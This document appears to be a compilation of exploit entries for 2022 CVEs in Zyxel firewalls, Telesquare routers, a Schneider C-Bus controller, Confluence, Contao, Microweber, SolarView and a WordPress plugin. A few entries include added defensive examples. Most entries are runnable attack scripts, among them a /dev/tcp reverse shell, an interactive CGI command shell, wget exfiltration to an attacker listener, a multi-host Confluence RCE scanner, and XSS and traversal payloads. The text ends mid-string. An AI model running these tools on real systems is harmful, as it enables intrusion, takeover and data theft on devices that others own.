# Vendor Homepage: https://contao.org/en/
# Software Link: https://github.com/contao/contao/releases/tag/4.13.2
# Version: [ 4.13.2 ]
# Tested on: [KALI OS]
# CVE : CVE-2022-1588
# References:
#   - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
#   - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
#   - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html

---------------

Steps to reproduce:

Navigate to the below URL
URL: https://localhost/contao/"><svg//onload=alert(112233)>

  16. # Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
# Date: May 18th 2022
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://www.zyxel.com
# Version: ZLD5.00 thru ZLD5.21
# Tested on: Linux
# CVE: CVE-2022-30525

from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import json
import base64
import requests
import argparse

parser = argparse.ArgumentParser(
    prog="CVE-2022-30525.py",
    description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-r", dest="host", help="Specify Remote host")
parser.add_argument("-p", dest="port", help="Specify Remote port")
args = parser.parse_args()

# base64-encoded ASCII-art banner printed by main()
banner = (
    "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
    "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
    "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
    "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
    "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
    "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
    "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
    "biA6KSApCg=="
)


def main():
    print("\n" + base64.b64decode(banner).decode("utf-8"))
    if None in vars(args).values():
        print(f"[!] Please enter all parameters !")
        parser.print_help()
        sys.exit()
    if "http" not in args.url:
        args.url = "https://" + args.url
    args.url += "/ztp/cgi-bin/handler"
    exploit(args.url, args.host, args.port)


def exploit(url, host, port):
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
        "Content-Type": "application/json",
    }
    data = {
        "command": "setWanPortSt",
        "proto": "dhcp",
        "port": "4",
        "vlan_tagged": "1",
        "vlanid": "5",
        "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
        "data": "hi",
    }
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")
    try:
        response = requests.post(
            url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
        )
    except (KeyboardInterrupt, requests.exceptions.Timeout):
        print("[!] Bye Bye hekcer !")
        sys.exit(1)
    finally:
        try:
            print("[!] Can't exploit the target ! Code :", response.status_code)
        except:
            print("[!] Enjoy your shell !!!")


if __name__ == "__main__":
    main()

17. # Exploit Title: Microweber CMS 1.2.15 - Account Takeover
# Date: 2022-05-09
# Exploit Author: Manojkumar J
# Vendor Homepage: https://github.com/microweber/microweber
# Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15
# Version: <=1.2.15
# Tested on: Windows10
# CVE : CVE-2022-1631

# Description:
Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 OAuth misconfiguration leads to account takeover.

# Steps to exploit:
1. Create an account with the victim's email address. Register endpoint: https://target-website.com/register#
2. When the victim tries to log in with one of the default OAuth providers (Google, GitHub, Microsoft, Twitter, LinkedIn, Telegram, Facebook, etc.) using the same e-mail address as the account created before, the OAuth login is matched to that account; this way we can take over the victim's account with the login credentials we created.
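The two steps above work because the OAuth callback treats an e-mail address as an identity key without checking who proved ownership of it. Below is an added example, not Microweber code, that replays the attack against a vulnerable matcher and against a hardened one. The in-memory user store, the provider claim names (`sub`, `email`, `email_verified`) and the linking policy are assumptions for illustration; `email_verified` is the standard OpenID Connect claim name.

```python
"""Added example, not Microweber code: the e-mail matching behind the account
takeover above, first in the vulnerable form and then hardened. The user
store, claim names and policy are assumptions for illustration."""
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class User:
    email: str
    password_hash: Optional[str]          # stand-in for a salted password hash
    email_verified: bool = False
    oauth_ids: Dict[str, str] = field(default_factory=dict)   # provider -> subject


class Users:
    """Minimal user store keyed by lower-cased e-mail address."""

    def __init__(self) -> None:
        self.by_email: Dict[str, User] = {}

    def register(self, email: str, password_hash: Optional[str]) -> User:
        # Step 1 of the advisory: anyone may register any address, unverified.
        user = User(email.lower(), password_hash)
        self.by_email[user.email] = user
        return user

    def find(self, email: str) -> Optional[User]:
        return self.by_email.get(email.lower())


class LinkRefused(Exception):
    pass


def oauth_login_vulnerable(users: Users, provider: str, claims: dict) -> User:
    """Matches on e-mail equality alone: whoever registered the address first
    owns the account the OAuth user is now signed into."""
    user = users.find(claims["email"])
    if user is None:
        user = users.register(claims["email"], password_hash=None)
        user.email_verified = True
    user.oauth_ids[provider] = claims["sub"]
    return user


def oauth_login_hardened(users: Users, provider: str, claims: dict) -> User:
    """Uses the address as an identity key only when both sides proved it."""
    if not claims.get("email_verified"):
        raise LinkRefused("provider did not verify the address")
    user = users.find(claims["email"])
    if user is None:
        user = users.register(claims["email"], password_hash=None)
        user.email_verified = True
    elif provider not in user.oauth_ids and not user.email_verified:
        # A pre-existing, never-verified local account with this address is
        # exactly the attacker's step 1: refuse to merge into it. A real app
        # would instead ask for that account's password before linking.
        raise LinkRefused("existing local account has not verified this address")
    user.oauth_ids[provider] = claims["sub"]
    return user


def takeover_demo(login) -> bool:
    """Replay the two steps above against `login`. Returns True when the
    victim ends up signed into the account whose password the attacker set."""
    users = Users()
    attacker_account = users.register("victim@example.com", "attacker-pw-hash")
    victim_claims = {"sub": "google-uid-123", "email": "victim@example.com",
                     "email_verified": True}
    try:
        landed_in = login(users, "google", victim_claims)
    except LinkRefused:
        return False
    return landed_in is attacker_account


if __name__ == "__main__":
    print("vulnerable takeover:", takeover_demo(oauth_login_vulnerable))
    print("hardened takeover:  ", takeover_demo(oauth_login_hardened))
```

Note that the hardened version checks both directions: the provider must assert `email_verified`, and the local account must have completed its own verification before an OAuth identity may be attached to it.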
18. #!/usr/bin/python3
# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
# Date: 24th May 2022
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: http://telesquare.co.kr/
# CVE : CVE-2021-46422
# Authentication Required: No

import requests
import argparse
import sys
from xml.etree import ElementTree


def sysArgument():
    ap = argparse.ArgumentParser()
    ap.add_argument("--host", required=True, help="target hostname/IP")
    args = vars(ap.parse_args())
    return args['host']


def checkHost(host):
    url = "http://" + host
    print("[*] Checking host is it alive?")
    try:
        rsl = requests.get(url)
        print("[*] The host is alive.")
    except requests.exceptions.RequestException as err:
        # any connection failure (refused, DNS, timeout), not only a timeout
        raise SystemExit(err)


def exploit(host):
    # The unauthenticated CGI runs the value of the Cmd parameter and returns
    # its output inside a <CmdResult> XML element.
    url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="
    #checking does the CGI exists?
    rsl = requests.get(url)
    if(rsl.status_code == 200):
        print("[*] CGI script exist!")
        print("[*] Injecting some shell command.")
        #1st test injecting id command
        cmd = "id"
        try:
            rsl = requests.get(url + cmd, stream=True)
            xmlparser = ElementTree.iterparse(rsl.raw)
            cmdRet = []
            for event, elem in xmlparser:
                if(elem.tag == 'CmdResult'):
                    cmdRet.append(elem.text)
        except:
            print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")
            sys.exit(0)
        if(len(cmdRet) != 0):
            print("[*] There's response from the CGI script!")
            print('[*] System ID: ' + cmdRet[0].strip())
            print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")
            #start shell iteration
            while(True):
                cmdInput = input("[SDT-CW3B1 Shell]# ")
                if(cmdInput == ".exit"):
                    print("[*] Exiting shell.")
                    sys.exit(0)
                rsl = requests.get(url + cmdInput, stream=True)
                xmlparser = ElementTree.iterparse(rsl.raw)
                for event, elem in xmlparser:
                    if(elem.tag == 'CmdResult'):
                        print(elem.text.strip())
                print('\n')
        else:
            print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.")
            sys.exit(0)
    else:
        print("[!] CGI script not found.")
        print(rsl.status_code)
        sys.exit(0)


def main():
    host = sysArgument()
    checkHost(host)
    exploit(host)


if __name__ == "__main__":
    main()
19. # Exploit Title: Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)
# Exploit Author: LiquidWorm

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit
#
#
# Vendor: Schneider Electric SE
# Product web page: https://www.se.com | https://www.clipsal.com
# Product details:
#   - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC
#   - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/
# Affected version: CLIPSAL 5500SHAC (i.MX28)
#                   CLIPSAL 5500NAC (i.MX28)
#                   SW: 1.10.0, 1.6.0
#                   HW: 1.0
#                   Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2
#                   SpaceLogic C-Bus
#
# Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser
# for C-Bus Automation Controller (5500SHAC) is an advanced controller from
# Schneider Electric. It is specifically designed to unite the C-Bus home
# automation solution with common household communication protocols, from
# lighting and climate control, to security, entertainment and energy metering.
# The Wiser for C-Bus Automation Controller manages and controls C-Bus systems
# for residential homes or zones within a building and integrates functions
# such as heating/cooling, energy/load monitoring and remote control for C-Bus
# and Modbus.
#
# Desc: The automation controller suffers from an authenticated arbitrary
# command execution vulnerability. An attacker can abuse the Start-up (init)
# script editor and exploit the 'script' POST parameter to insert malicious
# Lua script code and execute commands with root privileges that will grant
# full control of the device.
#
# ------------------------------------------------------------------------------
# $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888
# ----------------------------------------------------------------------
# Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38
# [*] Starting exfiltration handler on port 8888
# [*] Writing Lua initscript... done.
# [*] Running os.execute()... done.
# [*] Got request from 192.168.0.10:33522
# [*] Printing target's request:
#
# b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user
# 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption
# password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection:
# close\r\n\r\n"
#
# [*] Cleaning up... done.
#
# $
# ------------------------------------------------------------------------------
#
# Tested on: CPU model: ARM926EJ-S rev 5 (v5l)
#            GNU/Linux 4.4.115 (armv5tejl)
#            LuaJIT 2.0.5
#            FlashSYS v2
#            nginx
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             Macedonian Information Security Research and Development Laboratory
#                             Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2022-5707
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php
#
#
# 12.03.2022
#

import threading#!
import datetime##!
import requests##!
import socket####!
import time######!
import sys#######!
import re########!

from requests.auth import HTTPBasicAuth
from time import sleep as spikaj


class Wiser:
    def __init__(self):
        self.headers = None
        self.uri = '/scada-main/scripting/'
        self.savs = self.uri + 'save'
        self.runs = self.uri + 'run'
        self.start = datetime.datetime.now()
        self.start = self.start.strftime('%d.%m.%Y %H:%M:%S')
        self.creds = HTTPBasicAuth('admin', 'admin123')

    def memo(self):
        if len(sys.argv) != 5:
            self.use()
        else:
            self.target = sys.argv[1]
            self.execmd = sys.argv[2]
            self.localh = sys.argv[3]
            self.localp = int(sys.argv[4])
            if not 'http' in self.target:
                self.target = 'http://{}'.format(self.target)

    def exfil(self):
        print('[*] Starting exfiltration handler on port {}'.format(self.localp))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(('0.0.0.0', self.localp))
        while True:
            try:
                s.settimeout(9)
                s.listen(1)
                conn, addr = s.accept()
                print('[*] Got request from {}:{}'.format(addr[0], addr[1]))
                # The command output arrives in the User-Agent header of the
                # wget request the init script makes back to this listener.
                data = conn.recv(2003)
                print('[*] Printing target\'s request:')
                print('\n%s' %data)
            except socket.timeout as p:
                print('[!] Something\'s not right. Check your port mappings!')
            break
        s.close()
        self.clean()

    def mtask(self):
        konac = threading.Thread(name='thricer.exe', target=self.exfil)
        konac.start()
        self.byts()

    def byts(self):
        self.headers = {
            'Referer':self.target+'/scada-main/main/editor?id=initscript',
            'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"',
            'Cookie':'x-logout=0; x-auth=; x-login=1; pin=',
            'Content-Type':'text/plain;charset=UTF-8',
            'User-Agent':'SweetHomeAlabama/2003.59',
            'X-Requested-With':'XMLHttpRequest',
            'Accept-Language':'en-US,en;q=0.9',
            'Accept-Encoding':'gzip, deflate',
            'Sec-Ch-Ua-Platform':'"Windows"',
            'Sec-Fetch-Site':'same-origin',
            'Connection':'keep-alive',
            'Sec-Fetch-Dest':'empty',
            'Sec-Ch-Ua-Mobile':'?0',
            'Sec-Fetch-Mode':'cors',
            'Origin':self.target,
            'Accept':'*/*',
            'sec-gpc':'1'
        }

        # Payload A: save the init script. The 'script' field becomes
        # os.execute('wget -U "`<cmd>`" <lhost>:<lport>'), so the command
        # output is smuggled out in the User-Agent of the wget request.
        self.loada = '\x64\x61\x74\x61\x3D\x7B' # data={
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C' # "ext-comp-1004":"",
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C' # "ext-comp-1005":"",
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C' # "ext-comp-1006":"",
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C' # "ext-comp-1007":"",
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C' # "ext-comp-1008":"",
        self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"",
        self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C' # "id":"initscript",
        self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C' # "script":null,
        self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D' # "scriptonly":"true"}
        self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65' # &script=os.execute
        self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60' # ('wget -U "`
        self.loada += self.execmd # [command input]
        self.loada += '\x60\x22\x20' # `".
        self.loada += self.localh+':'+str(self.localp) # [listener input]
        self.loada += '\x27\x29' # ')

        # Payload B: run the saved init script.
        self.loadb = '\x64\x61\x74\x61\x3D\x7B' # data={
        self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D' # "id":"initscript"}

        print('[*] Writing Lua initscript... ', end='')
        sys.stdout.flush()
        spikaj(0.7)
        htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds)
        if not 'success' in htreq.text:
            print('didn\'t work!')
            exit(17)
        else:
            print('done.')

        print('[*] Running os.execute()... ', end='')
        sys.stdout.flush()
        spikaj(0.7)
        htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds)
        if not 'success' in htreq.text:
            print('didn\'t work!')
            exit(19)
        else:
            print('done.')

    def splash(self):
        Baah_loon = '''
                         ######
                      ##########
                         ######
                           _\_
                     ##===----[.].]
                    #(     ,    _\\
                    # )\__|  \ /
                        `-._``-'  >@
                           |
                           |
                           |
                           |
                           | Schneider Electric C-Bus SmartHome Automation Controller
                           | Root Remote Code Execution Proof of Concept
                           | ZSL-2022-5707
                           |
                           |
        '''
        print(Baah_loon)

    def use(self):
        self.splash()
        print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]')
        exit(0)

    def clean(self):
        print('\n[*] Cleaning up... ', end='')
        sys.stdout.flush()
        spikaj(0.7)
        self.headers = {'X-Requested-With':'XMLHttpRequest'}
        # URL-encoded form of data={"ext-comp-1004":"",...,"id":"initscript",
        # "script":"","scriptonly":"true"}: overwrites the init script with an
        # empty one so the backdoor does not survive the next boot.
        self.blank = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32'
        self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30'
        self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32'
        self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78'
        self.dlank = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35'
        self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32'
        self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D'
        self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32'
        self.clank = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25'
        self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F'
        self.clank += '\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25'
        self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'
        self.slank = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70'
        self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41'
        self.slank += '\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32'
        self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70'
        self.glank = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25'
        self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'
        self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41'
        self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69'
        self.hlank = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32'
        self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33'
        self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25'
        self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C'
        self.flank = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74'
        self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######'
        self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}'
        htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds)
        if not 'success' in htreq.text:
            print('didn\'t work!')
            exit(18)
        else:
            print('done.')
            exit(-1)

    def main(self):
        print('-'*70)
        print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start)
        self.memo(), self.mtask()


if __name__ == '__main__':
    Wiser().main()
20. # Exploit Title: SolarView Compact 6.00 - Directory Traversal
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : Aiactive
# Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29298
# Tested on: Windows

# Exploit:
http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg
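The PoC URL above combines two classic defects: dot-dot segments that walk out of the download directory, and a trailing `%00.jpg` that satisfies a string-based extension check while a C-level `open()` stops at the NUL byte. The following is an added example, not SolarView code, that resolves a `file` parameter the vulnerable way and the safe way side by side. The base directory contents and the extension allowlist are constructed assumptions; the payload string is the one from the PoC.

```python
"""Added example, not SolarView code: a downloader.php-style 'file' parameter
resolved two ways. resolve_unsafe() mirrors the pattern the PoC above abuses;
resolve_safe() rejects NUL bytes, keeps only a bare file name, allowlists
extensions and confirms the real path stays inside the base directory.
The base directory contents and the extension list are constructed."""
import os
import tempfile
from urllib.parse import unquote

ALLOWED_EXT = {".jpg", ".png", ".csv"}   # assumed allowlist

# The exact value from the PoC URL above.
PAYLOAD = "../../../../../../../../../../../../../etc/passwd%00.jpg"


def resolve_unsafe(base: str, user_path: str) -> str:
    """Vulnerable: extension check on the decoded string, then a plain join.
    The NUL truncation a C open() performs is emulated explicitly here."""
    decoded = unquote(user_path)
    if not decoded.endswith(tuple(ALLOWED_EXT)):
        raise PermissionError("extension not allowed")
    truncated = decoded.split("\x00", 1)[0]          # '.jpg' never reaches the OS
    return os.path.normpath(os.path.join(base, truncated))


def resolve_safe(base: str, user_path: str) -> str:
    decoded = unquote(user_path)
    if "\x00" in decoded:
        raise PermissionError("NUL byte in path")
    name = os.path.basename(decoded)
    # A downloader serves files from one directory: no separators, no dot segments.
    if name != decoded or name in ("", ".", ".."):
        raise PermissionError("path components not allowed")
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXT:
        raise PermissionError("extension not allowed")
    base_real = os.path.realpath(base)
    full = os.path.realpath(os.path.join(base_real, name))
    # Belt and braces: a symlink inside base could still point outside it.
    if os.path.commonpath([base_real, full]) != base_real:
        raise PermissionError("escapes base directory")
    return full


def demo():
    """Returns (unsafe_escaped_base, safe_rejected_payload, safe_served_name)."""
    base = tempfile.mkdtemp()
    open(os.path.join(base, "report.csv"), "w").close()   # constructed fixture
    base_real = os.path.realpath(base)

    unsafe = os.path.realpath(resolve_unsafe(base, PAYLOAD))
    unsafe_escaped = os.path.commonpath([base_real, unsafe]) != base_real

    try:
        resolve_safe(base, PAYLOAD)
        safe_rejected = False
    except PermissionError:
        safe_rejected = True

    served = resolve_safe(base, "report.csv")
    return unsafe_escaped, safe_rejected, os.path.basename(served)


if __name__ == "__main__":
    print(demo())
```

The important design choice is that `resolve_safe` decides on the decoded name before it touches the filesystem and then re-checks containment on the real path afterwards, so neither encoding tricks nor symlinks inside the directory can widen what the endpoint serves.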
21. # Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)
# Date: 2022-06-05
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://motopress.com/
# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
# Version: 4.2.4
# Tested on: Windows/XAMPP
###########################################################################

PoC:
1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type
2. Click on "Add Accommodation Type".
3. Add title payload: "><script>alert("XSS")</script>
4. Excerpt input payload: "><script>alert("XSS")</script>
5. Click publish.
6. Visit http://localhost/accommodations/
7. The XSS payload executes.
22. # Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 06/06/2022
# Exploit Author: h3v0x
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: All < 7.4.17 versions before 7.18.1
# Tested on: -
# CVE : CVE-2022-26134
# https://github.com/h3v0x/CVE-2022-26134

#!/usr/bin/python3

import sys
import requests
import optparse
import multiprocessing
from requests.packages import urllib3
from requests.exceptions import MissingSchema, InvalidURL

urllib3.disable_warnings()

requestEngine = multiprocessing.Manager()
session = requests.Session()
global paramResults
paramResults = requestEngine.list()
globals().update(locals())


# The request path is a URL-encoded OGNL expression. Decoded:
#   ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime()
#     .exec("<cmd>").getInputStream(),"utf-8")).(@com.opensymphony.webwork
#     .ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
# The command output comes back in the X-Cmd-Response header of the 302.
def spiderXpl(url):
    globals().update(locals())
    if not url.startswith('http'):
        url='http://'+url
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
               "Connection": "close",
               "Accept-Encoding": "gzip, deflate"}
    try:
        response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)
        if(response.status_code == 302):
            print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])
            inputBuffer = str(response.headers['X-Cmd-Response'])
            paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n')
        else:
            pass
    except requests.exceptions.ConnectionError:
        print('[x] Failed to Connect: '+url)
        pass
    except KeyboardInterrupt:
        print('[!] Stopping exploit...')
        exit(0)
    except (MissingSchema, InvalidURL):
        pass


def banner():
    print('[-] CVE-2022-26134')
    print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n')


def main():
    banner()
    globals().update(locals())
    sys.setrecursionlimit(100000)
    if not optionsOpt.filehosts:
        url = optionsOpt.url
        spiderXpl(url)
    else:
        f = open(optionsOpt.filehosts)
        urls = map(str.strip, f.readlines())
        multiReq = multiprocessing.Pool(optionsOpt.threads_set)
        try:
            multiReq.map(spiderXpl, urls)
            multiReq.close()
            multiReq.join()
        except UnboundLocalError:
            pass
        except KeyboardInterrupt:
            exit(0)
    if optionsOpt.output:
        print("\n[!] Saving the output result in: %s" % optionsOpt.output)
        with open(optionsOpt.output, "w") as f:
            for result in paramResults:
                f.write("%s\n" % result)
        f.close()


if __name__ == "__main__":
    parser = optparse.OptionParser()
    parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')
    parser.add_option('-f', '--file', dest="filehosts", help='example.txt')
    parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10)
    parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8)
    parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt')
    parser.add_option('-c', '--cmd', dest="command", type=str, default='id')
    optionsOpt, args = parser.parse_args()
    main()
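Both the Confluence exploit above and the Telesquare SDT-CW3B1 one (post 18) put their payload in the GET request line, which means a plain access log is enough to spot them after the fact. The following is an added example, not code from either advisory: a small scanner that decodes each request target once, the way the server does, and flags the `admin.cgi?Command=sysCommand&Cmd=` call and any OGNL expression in the path. The log lines are constructed samples in Apache/nginx combined format and the rule names are my own.

```python
"""Added example, not code from either advisory: an access-log scanner for the
two GET-visible injections above, Telesquare admin.cgi sysCommand
(CVE-2021-46422) and the Confluence OGNL path expression (CVE-2022-26134).
Log lines are constructed samples; rule names are my own."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Substrings of the decoded, lower-cased request target that indicate an OGNL
# expression like the one the exploit above sends.
OGNL_MARKERS = ("${", "@java.lang.runtime", "@org.apache.commons.io.ioutils", ".getruntime(")


def classify(line: str):
    """Return (rule, detail) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode once, as the server does, so %24%7B is seen as ${ and Cmd=%69%64 as id.
    target = unquote(m.group("target"))
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    if parts.path.endswith("/cgi-bin/admin.cgi") and "sysCommand" in query.get("Command", []):
        return ("telesquare-syscommand", query.get("Cmd", [""])[0])
    low = target.lower()
    if any(marker in low for marker in OGNL_MARKERS):
        # The PoC expects a 302 with the output in an X-Cmd-Response header;
        # the status is in the log, the header is not.
        return ("confluence-ognl", f"status={m.group('status')} path={parts.path[:48]}")
    return None


def scan(lines):
    """Return [(client_ip, rule, detail)] for every line a rule fires on."""
    hits = []
    for line in lines:
        result = classify(line)
        if result:
            hits.append((LOG_RE.match(line).group("ip"),) + result)
    return hits


# Constructed sample log (not captured from a real device).
SAMPLE_LOG = """\
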